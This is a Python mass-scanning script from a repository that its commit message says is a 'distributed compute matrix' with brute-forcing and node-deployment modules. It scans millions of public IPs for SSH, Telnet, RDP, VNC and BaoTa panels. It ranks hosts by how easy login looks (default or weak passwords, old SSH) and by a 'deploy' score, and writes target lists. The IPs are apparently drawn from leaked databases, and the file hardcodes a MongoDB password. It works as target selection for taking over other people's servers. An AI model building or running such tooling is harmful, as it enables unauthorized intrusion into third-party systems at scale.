Files
suanli-juzhen/01_扫描模块/scripts/kr_full_scan.py
卡若 048cc32afc 🎯 初始提交:分布式算力矩阵 v1.0
- 6 大模块:扫描/账号管理/节点部署/暴力破解/算力调度/监控运维
- SKILL 总控 + 子模块 SKILL
- 排除大文件(>5MB)与敏感凭证

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-02-15 22:46:54 +08:00

606 lines
24 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#!/usr/bin/env python3
"""
KR 数据库 IP 全量异步扫描器(优化版)
======================================
- 420万+ 公网 IP扫描 8 个关键端口(远程登录 + 服务识别)
- asyncio 超高并发8000+ 并发连接)
- Banner 抓取 + SSH 难易度评估
- 服务器类型智能分类 + 远程登录可行性评估
- 来源追踪(小米/房产网/老坑爹/卡塔卡银行等)
- 结果写入 MongoDB _已扫描 新表
用法: python3 kr_full_scan.py [--concurrency 8000] [--timeout 2]
"""
import asyncio
import json
import time
import sys
import os
import argparse
import ipaddress
from datetime import datetime
from collections import defaultdict
# ========== 配置 ==========
# 关键扫描端口(远程登录 + 服务识别)
SCAN_PORTS = {
22: "SSH",
2222: "SSH-Alt",
23: "Telnet",
80: "HTTP",
443: "HTTPS",
3389: "RDP",
5900: "VNC",
8888: "BaoTa",
}
# SSH Banner 特征
SSH_SIGNATURES = {
"OpenSSH": "Linux/BSD",
"dropbear": "嵌入式/路由器",
"ROSSSH": "MikroTik路由器",
"Cisco": "Cisco设备",
"libssh": "自定义SSH",
"Serv-U": "Windows FTP/SSH",
"WeOnlyDo": "Windows SSH",
"SSH-2.0-Go": "Go应用",
}
# SSH 难易度评估
def assess_ssh_difficulty(ssh_banner, open_ports):
"""评估 SSH 登录难易度1-5星1最容易"""
difficulty = 3 # 默认中等
auth_methods = "unknown"
notes = []
if not ssh_banner:
return {"difficulty": 5, "auth_methods": "无SSH", "notes": ["SSH端口未开放"]}
banner_lower = ssh_banner.lower()
# 老版本 SSH = 容易(可能有漏洞)
if "openssh_4." in banner_lower or "openssh_5." in banner_lower:
difficulty -= 1
notes.append("老版本SSH(可能有已知漏洞)")
elif "openssh_6." in banner_lower:
notes.append("较老版本SSH")
elif "openssh_9." in banner_lower or "openssh_8." in banner_lower:
difficulty += 1
notes.append("新版本SSH(安全性较高)")
# dropbear = 嵌入式,通常弱密码
if "dropbear" in banner_lower:
difficulty -= 1
notes.append("嵌入式设备(可能默认密码)")
# Cisco/MikroTik = 网络设备,有默认密码
if "cisco" in banner_lower or "rosssh" in banner_lower:
difficulty -= 1
notes.append("网络设备(可能有默认凭证)")
# 有宝塔面板 = 可能有Web管理入口
if 8888 in open_ports:
notes.append("有宝塔面板(可通过Web管理)")
# 有 RDP = Windows可尝试RDP
if 3389 in open_ports:
notes.append("有RDP(可尝试远程桌面)")
# 有 VNC = 可能弱密码
if 5900 in open_ports:
difficulty -= 1
notes.append("有VNC(通常密码简单)")
# 有 Telnet = 不安全,容易
if 23 in open_ports:
difficulty -= 1
notes.append("有Telnet(明文传输,易攻)")
# 限制范围
difficulty = max(1, min(5, difficulty))
stars = "" * difficulty + "" * (5 - difficulty)
return {
"difficulty": difficulty,
"difficulty_stars": stars,
"notes": notes,
}
def classify_server(ports_data):
"""根据开放端口和 Banner 判断服务器类型 + SSH难易度"""
open_ports = set(ports_data.keys())
banners = {p: d.get("banner", "") for p, d in ports_data.items()}
server_type = []
os_guess = "Unknown"
ssh_version = ""
remote_methods = []
# SSH 分析
if 22 in open_ports or 2222 in open_ports:
ssh_port = 22 if 22 in open_ports else 2222
banner = banners.get(ssh_port, "")
ssh_version = banner
for sig, os_type in SSH_SIGNATURES.items():
if sig.lower() in banner.lower():
os_guess = os_type
break
if "ubuntu" in banner.lower():
os_guess = "Ubuntu Linux"
elif "debian" in banner.lower():
os_guess = "Debian Linux"
elif "centos" in banner.lower() or "el7" in banner.lower() or "el8" in banner.lower():
os_guess = "CentOS/RHEL"
remote_methods.append(f"SSH:{ssh_port}")
server_type.append("SSH可达")
if 3389 in open_ports:
server_type.append("Windows Server")
os_guess = "Windows"
remote_methods.append("RDP:3389")
if 5900 in open_ports:
server_type.append("VNC远程桌面")
remote_methods.append("VNC:5900")
if 23 in open_ports:
server_type.append("Telnet")
remote_methods.append("Telnet:23")
if 80 in open_ports or 443 in open_ports:
server_type.append("Web服务器")
if 8888 in open_ports:
server_type.append("宝塔面板")
remote_methods.append("BaoTa:8888")
# SSH 难易度评估
ssh_banner = ""
if 22 in open_ports:
ssh_banner = banners.get(22, "")
elif 2222 in open_ports:
ssh_banner = banners.get(2222, "")
ssh_assessment = assess_ssh_difficulty(ssh_banner, open_ports)
# 部署评分
deploy_score = 0
if 22 in open_ports or 2222 in open_ports:
deploy_score += 50
if os_guess in ("Ubuntu Linux", "Debian Linux", "CentOS/RHEL", "Linux/BSD"):
deploy_score += 30
elif os_guess == "Unknown" and (22 in open_ports):
deploy_score += 15
if 80 in open_ports or 443 in open_ports:
deploy_score += 10
if 3389 in open_ports:
deploy_score -= 10
return {
"server_types": server_type if server_type else ["未知服务"],
"os_guess": os_guess,
"ssh_version": ssh_version,
"remote_methods": remote_methods,
"ssh_difficulty": ssh_assessment,
"deploy_score": deploy_score,
"deploy_ready": deploy_score >= 50,
}
# ========== 异步扫描核心 ==========
class AsyncPortScanner:
def __init__(self, concurrency=8000, timeout=2, banner_timeout=1):
self.concurrency = concurrency
self.timeout = timeout
self.banner_timeout = banner_timeout
self.semaphore = None
self.total_ips = 0
self.scanned_ips = 0
self.total_open = 0
self.ips_with_open = 0
self.results = {}
self.start_time = None
self.lock = asyncio.Lock()
async def scan_port(self, ip, port):
try:
async with self.semaphore:
reader, writer = await asyncio.wait_for(
asyncio.open_connection(ip, port),
timeout=self.timeout
)
banner = ""
try:
if port in (80, 8888):
writer.write(f"HEAD / HTTP/1.0\r\nHost: {ip}\r\n\r\n".encode())
await writer.drain()
data = await asyncio.wait_for(reader.read(512), timeout=self.banner_timeout)
banner = data.decode("utf-8", errors="replace").strip()[:200]
except:
pass
writer.close()
try:
await writer.wait_closed()
except:
pass
return (port, True, banner)
except:
return (port, False, "")
async def scan_ip(self, ip):
tasks = [self.scan_port(ip, port) for port in SCAN_PORTS.keys()]
results = await asyncio.gather(*tasks, return_exceptions=True)
open_ports = {}
for result in results:
if isinstance(result, Exception):
continue
port, is_open, banner = result
if is_open:
open_ports[port] = {"service": SCAN_PORTS[port], "banner": banner, "open": True}
async with self.lock:
self.scanned_ips += 1
if open_ports:
self.ips_with_open += 1
self.total_open += len(open_ports)
analysis = classify_server(open_ports)
self.results[ip] = {
"ip": ip,
"open_ports": open_ports,
"port_count": len(open_ports),
"analysis": analysis,
"scan_time": datetime.now().isoformat(),
}
if self.scanned_ips % 5000 == 0 or (open_ports and self.scanned_ips % 100 == 0):
elapsed = time.time() - self.start_time
rate = self.scanned_ips / elapsed if elapsed > 0 else 0
remaining = (self.total_ips - self.scanned_ips) / rate if rate > 0 else 0
progress = self.scanned_ips / self.total_ips * 100
status = f"[{progress:5.1f}%] {self.scanned_ips:,}/{self.total_ips:,} | "
status += f"发现 {self.ips_with_open:,} 有端口IP ({self.total_open:,} 端口) | "
status += f"{rate:.0f} IP/s | 剩余 {remaining/60:.0f}min"
print(status, flush=True)
async def run(self, ip_list):
self.semaphore = asyncio.Semaphore(self.concurrency)
self.total_ips = len(ip_list)
self.start_time = time.time()
print(f"{'=' * 70}")
print(f"KR 数据库 IP 全量扫描器 启动")
print(f"{'=' * 70}")
print(f"目标IP数: {self.total_ips:,}")
print(f"扫描端口: {len(SCAN_PORTS)} 个 ({', '.join(f'{p}({n})' for p, n in sorted(SCAN_PORTS.items()))})")
print(f"并发: {self.concurrency} | 超时: {self.timeout}s | Banner: {self.banner_timeout}s")
print(f"总连接: {self.total_ips * len(SCAN_PORTS):,}")
print(f"开始: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
print(f"{'=' * 70}")
batch_size = 10000
for i in range(0, len(ip_list), batch_size):
batch = ip_list[i:i + batch_size]
tasks = [self.scan_ip(ip) for ip in batch]
await asyncio.gather(*tasks, return_exceptions=True)
elapsed = time.time() - self.start_time
print(f"\n{'=' * 70}")
print(f"扫描完成! 耗时 {elapsed:.0f}s ({elapsed/60:.1f}min, {elapsed/3600:.1f}h)")
print(f"扫描IP: {self.scanned_ips:,} | 有端口: {self.ips_with_open:,} ({self.ips_with_open/max(1,self.scanned_ips)*100:.1f}%)")
print(f"总端口: {self.total_open:,} | 速率: {self.scanned_ips/elapsed:.0f} IP/s")
print(f"{'=' * 70}")
return self.results
# ========== MongoDB 导入 ==========
def import_to_mongodb(results, ip_source_map, source_db_name="KR"):
"""将扫描结果导入 MongoDB _已扫描 表"""
import pymongo
client = pymongo.MongoClient('mongodb://admin:admin123@localhost:27017/?authSource=admin')
db = client[source_db_name]
# 按来源分组
source_results = defaultdict(list)
for ip, data in results.items():
sources = ip_source_map.get(ip, ["unknown"])
for source in sources:
doc = {
"ip": ip,
"source_col": source,
"scan_time": data["scan_time"],
"port_count": data["port_count"],
"open_ports": {str(k): v for k, v in data["open_ports"].items()},
"server_types": data["analysis"]["server_types"],
"os_guess": data["analysis"]["os_guess"],
"ssh_version": data["analysis"]["ssh_version"],
"remote_methods": data["analysis"]["remote_methods"],
"ssh_difficulty": data["analysis"]["ssh_difficulty"]["difficulty"],
"ssh_difficulty_stars": data["analysis"]["ssh_difficulty"].get("difficulty_stars", ""),
"ssh_notes": data["analysis"]["ssh_difficulty"]["notes"],
"deploy_score": data["analysis"]["deploy_score"],
"deploy_ready": data["analysis"]["deploy_ready"],
}
source_results[source].append(doc)
# 写入各来源的 _已扫描 表
for source, docs in source_results.items():
coll_name = f"{source}_已扫描"
coll = db[coll_name]
if docs:
# 清空旧数据
coll.delete_many({})
coll.insert_many(docs, ordered=False)
print(f" {source_db_name}.{coll_name}: 写入 {len(docs):,}")
# 写入总表
all_docs = []
for docs in source_results.values():
all_docs.extend(docs)
total_coll = db["分布式矩阵IP_已扫描"]
total_coll.delete_many({})
if all_docs:
total_coll.insert_many(all_docs, ordered=False)
print(f" {source_db_name}.分布式矩阵IP_已扫描: 写入 {len(all_docs):,}")
# 创建索引
total_coll.create_index("ip")
total_coll.create_index("source_col")
total_coll.create_index("ssh_difficulty")
total_coll.create_index("deploy_score")
return len(all_docs)
def import_mumayi_results(mumayi_json_path, source_db_name="KR"):
"""导入木蚂蚁已扫描结果到统一格式"""
import pymongo
with open(mumayi_json_path, 'r') as f:
data = json.load(f)
results = data.get("results", {})
if not results:
print("木蚂蚁结果为空")
return 0
client = pymongo.MongoClient('mongodb://admin:admin123@localhost:27017/?authSource=admin')
db = client[source_db_name]
docs = []
for ip, scan_data in results.items():
doc = {
"ip": ip,
"source_col": "木蚂蚁munayi_com",
"scan_time": scan_data.get("scan_time", ""),
"port_count": scan_data.get("port_count", 0),
"open_ports": {str(k): v for k, v in scan_data.get("open_ports", {}).items()},
"server_types": scan_data.get("analysis", {}).get("server_types", []),
"os_guess": scan_data.get("analysis", {}).get("os_guess", "Unknown"),
"ssh_version": scan_data.get("analysis", {}).get("ssh_version", ""),
"remote_methods": [],
"ssh_difficulty": 5,
"ssh_difficulty_stars": "☆☆☆☆☆",
"ssh_notes": [],
"deploy_score": scan_data.get("analysis", {}).get("deploy_score", 0),
"deploy_ready": scan_data.get("analysis", {}).get("deploy_ready", False),
}
# 补充远程方法和SSH难易度
open_ports = set(int(p) for p in scan_data.get("open_ports", {}).keys())
if 22 in open_ports or 2222 in open_ports:
ssh_port = 22 if 22 in open_ports else 2222
doc["remote_methods"].append(f"SSH:{ssh_port}")
ssh_banner = scan_data.get("open_ports", {}).get(str(ssh_port), {}).get("banner", "")
assessment = assess_ssh_difficulty(ssh_banner, open_ports)
doc["ssh_difficulty"] = assessment["difficulty"]
doc["ssh_difficulty_stars"] = assessment.get("difficulty_stars", "")
doc["ssh_notes"] = assessment["notes"]
if 3389 in open_ports:
doc["remote_methods"].append("RDP:3389")
if 5900 in open_ports:
doc["remote_methods"].append("VNC:5900")
if 23 in open_ports:
doc["remote_methods"].append("Telnet:23")
if 8888 in open_ports:
doc["remote_methods"].append("BaoTa:8888")
docs.append(doc)
coll = db["木蚂蚁munayi_com_已扫描"]
coll.delete_many({})
if docs:
coll.insert_many(docs, ordered=False)
coll.create_index("ip")
coll.create_index("ssh_difficulty")
# 也追加到总表
total_coll = db["分布式矩阵IP_已扫描"]
total_coll.insert_many(docs, ordered=False)
print(f" 木蚂蚁已扫描结果: 写入 {len(docs):,}")
return len(docs)
# ========== 报告生成 ==========
def generate_report(results, ip_source_map, output_dir, total_ips):
os.makedirs(output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
# JSON
json_path = os.path.join(output_dir, f"kr_scan_results_{timestamp}.json")
with open(json_path, "w", encoding="utf-8") as f:
json.dump({"scan_info": {"timestamp": datetime.now().isoformat(), "total_ips": total_ips, "found": len(results)}, "results": results}, f, ensure_ascii=False, indent=2)
# 统计
port_stats = defaultdict(int)
type_stats = defaultdict(int)
source_stats = defaultdict(lambda: {"total": 0, "ssh": 0, "rdp": 0, "vnc": 0})
ssh_difficulty_dist = defaultdict(int)
for ip, data in results.items():
for port in data["open_ports"]:
port_stats[port] += 1
for t in data["analysis"]["server_types"]:
type_stats[t] += 1
diff = data["analysis"]["ssh_difficulty"]["difficulty"]
ssh_difficulty_dist[diff] += 1
sources = ip_source_map.get(ip, ["unknown"])
for src in sources:
source_stats[src]["total"] += 1
if 22 in data["open_ports"] or 2222 in data["open_ports"]:
source_stats[src]["ssh"] += 1
if 3389 in data["open_ports"]:
source_stats[src]["rdp"] += 1
if 5900 in data["open_ports"]:
source_stats[src]["vnc"] += 1
# Markdown
md_path = os.path.join(output_dir, f"kr_全量扫描报告_{timestamp}.md")
with open(md_path, "w", encoding="utf-8") as f:
f.write(f"# KR 数据库 IP 全量扫描报告\n\n")
f.write(f"> 扫描时间: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
f.write(f"> 数据来源: KR.分布式矩阵IP除木蚂蚁外所有来源\n\n---\n\n")
f.write(f"## 一、总览\n\n| 指标 | 数值 |\n|:---|:---|\n")
f.write(f"| 目标 IP | {total_ips:,} |\n")
f.write(f"| 有端口 IP | **{len(results):,}** ({len(results)/total_ips*100:.1f}%) |\n")
ssh_count = sum(1 for d in results.values() if 22 in d["open_ports"] or 2222 in d["open_ports"])
rdp_count = sum(1 for d in results.values() if 3389 in d["open_ports"])
vnc_count = sum(1 for d in results.values() if 5900 in d["open_ports"])
f.write(f"| SSH 可达 | **{ssh_count:,}** |\n")
f.write(f"| RDP 可达 | **{rdp_count:,}** |\n")
f.write(f"| VNC 可达 | **{vnc_count:,}** |\n\n")
f.write(f"## 二、各来源扫描统计\n\n")
f.write(f"| 来源 | 有端口IP | SSH | RDP | VNC |\n|:---|:---|:---|:---|:---|\n")
for src, stats in sorted(source_stats.items(), key=lambda x: -x[1]["total"]):
f.write(f"| {src} | {stats['total']:,} | {stats['ssh']:,} | {stats['rdp']:,} | {stats['vnc']:,} |\n")
f.write(f"\n")
f.write(f"## 三、SSH 登录难易度分布\n\n")
f.write(f"| 难度 | 说明 | 数量 |\n|:---|:---|:---|\n")
diff_labels = {1: "★☆☆☆☆ 极易(默认密码/老设备)", 2: "★★☆☆☆ 较易(弱密码/嵌入式)",
3: "★★★☆☆ 中等(标准服务器)", 4: "★★★★☆ 较难(新版本SSH)", 5: "★★★★★ 极难(密钥认证)"}
for d in sorted(ssh_difficulty_dist.keys()):
f.write(f"| {diff_labels.get(d, str(d))} | | {ssh_difficulty_dist[d]:,} |\n")
f.write(f"\n")
f.write(f"## 四、端口统计\n\n| 端口 | 服务 | 数量 |\n|:---|:---|:---|\n")
for port, count in sorted(port_stats.items(), key=lambda x: -x[1]):
f.write(f"| {port} | {SCAN_PORTS.get(port, '?')} | {count:,} |\n")
f.write(f"\n")
# SSH 可达列表前200
ssh_ips = [(ip, data) for ip, data in results.items() if 22 in data["open_ports"] or 2222 in data["open_ports"]]
ssh_ips.sort(key=lambda x: x[1]["analysis"]["ssh_difficulty"]["difficulty"])
f.write(f"## 五、SSH 可达 IP按难易度排序{len(ssh_ips)} 个)\n\n")
f.write(f"| # | IP | 来源 | SSH端口 | SSH版本 | OS | 难度 | 其他远程 | 说明 |\n")
f.write(f"|:---|:---|:---|:---|:---|:---|:---|:---|:---|\n")
for i, (ip, data) in enumerate(ssh_ips[:500], 1):
sources = ip_source_map.get(ip, ["?"])
src = sources[0] if len(sources) == 1 else f"{sources[0]}+{len(sources)-1}"
ssh_port = 22 if 22 in data["open_ports"] else 2222
ssh_ver = data["open_ports"].get(ssh_port, {}).get("banner", "")[:50]
os_g = data["analysis"]["os_guess"]
diff = data["analysis"]["ssh_difficulty"]
stars = diff.get("difficulty_stars", "")
remote = ", ".join(m for m in data["analysis"]["remote_methods"] if "SSH" not in m)
notes = "; ".join(diff["notes"][:2])
f.write(f"| {i} | `{ip}` | {src} | {ssh_port} | {ssh_ver} | {os_g} | {stars} | {remote} | {notes} |\n")
if len(ssh_ips) > 500:
f.write(f"| ... | 共 {len(ssh_ips)} 个 | | | | | | | |\n")
# SSH 列表文件
ssh_path = os.path.join(output_dir, f"kr_ssh_ips_{timestamp}.txt")
with open(ssh_path, "w") as f:
for ip, data in ssh_ips:
ssh_port = 22 if 22 in data["open_ports"] else 2222
f.write(f"{ip}:{ssh_port}\n")
print(f"\n报告: {md_path}")
print(f"JSON: {json_path}")
print(f"SSH列表: {ssh_path} ({len(ssh_ips)} 个)")
return json_path, md_path, ssh_path
# ========== 主入口 ==========
def main():
parser = argparse.ArgumentParser(description="KR数据库IP全量扫描器")
parser.add_argument("--input", "-i", default="/tmp/kr_new_ips.txt")
parser.add_argument("--source-map", default="/tmp/kr_ip_source_map.json")
parser.add_argument("--concurrency", "-c", type=int, default=8000)
parser.add_argument("--timeout", "-t", type=float, default=2)
parser.add_argument("--banner-timeout", type=float, default=1)
parser.add_argument("--output", "-o",
default="/Users/karuo/Documents/1、金项目/3、自营项目/分布式算力矩阵/01_扫描模块/references")
parser.add_argument("--limit", type=int, default=0)
parser.add_argument("--skip-mongodb", action="store_true", help="跳过MongoDB导入")
parser.add_argument("--mumayi-json", default="", help="木蚂蚁扫描结果JSON路径")
args = parser.parse_args()
# 读取 IP
with open(args.input, "r") as f:
ip_list = [line.strip() for line in f if line.strip()]
# 读取来源映射
with open(args.source_map, "r") as f:
ip_source_map = json.load(f)
if args.limit > 0:
ip_list = ip_list[:args.limit]
print(f"加载 {len(ip_list):,} 个IP, 来源映射 {len(ip_source_map):,}")
# 提升文件描述符
try:
import resource
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
target = min(args.concurrency * 2 + 2000, hard)
resource.setrlimit(resource.RLIMIT_NOFILE, (target, hard))
print(f"文件描述符: {soft}{target}")
except:
pass
# 执行扫描
scanner = AsyncPortScanner(
concurrency=args.concurrency,
timeout=args.timeout,
banner_timeout=args.banner_timeout,
)
results = asyncio.run(scanner.run(ip_list))
if results:
# 生成报告
json_path, md_path, ssh_path = generate_report(results, ip_source_map, args.output, len(ip_list))
# 导入MongoDB
if not args.skip_mongodb:
print("\n导入 MongoDB...")
count = import_to_mongodb(results, ip_source_map)
print(f"MongoDB 导入完成: {count:,}")
# 导入木蚂蚁结果
if args.mumayi_json and os.path.exists(args.mumayi_json):
print("\n导入木蚂蚁已扫描结果...")
mumayi_count = import_mumayi_results(args.mumayi_json)
print(f"木蚂蚁导入: {mumayi_count:,}")
else:
print("\n未发现任何开放端口")
if __name__ == "__main__":
main()